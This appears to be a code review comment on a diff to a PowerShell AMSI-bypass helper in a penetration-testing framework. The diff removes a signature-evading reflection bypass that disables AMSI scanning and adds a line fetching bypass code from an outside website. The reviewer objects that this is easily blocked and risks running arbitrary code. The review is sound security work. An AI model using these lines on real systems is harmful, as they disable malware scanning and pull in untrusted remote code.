lib/rex/powershell/psh_methods.rb

```diff
@@ -91,8 +91,8 @@ def self.ignore_ssl_certificate
     # @return [String] PowerShell code to bypass AMSI
     def self.bypass_amsi()
       %q{
-        $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-        $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
+        $accessAMBY = Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/Generate -UseBasicParsing;
```

Comment:
Calling out to a public website like this would be very easy to block and identify, as well as leaving the possibility of running arbitrary malicious code during pen tests unintentionally. I think we'd want to generate any AMSI bypass logic ourselves with ruby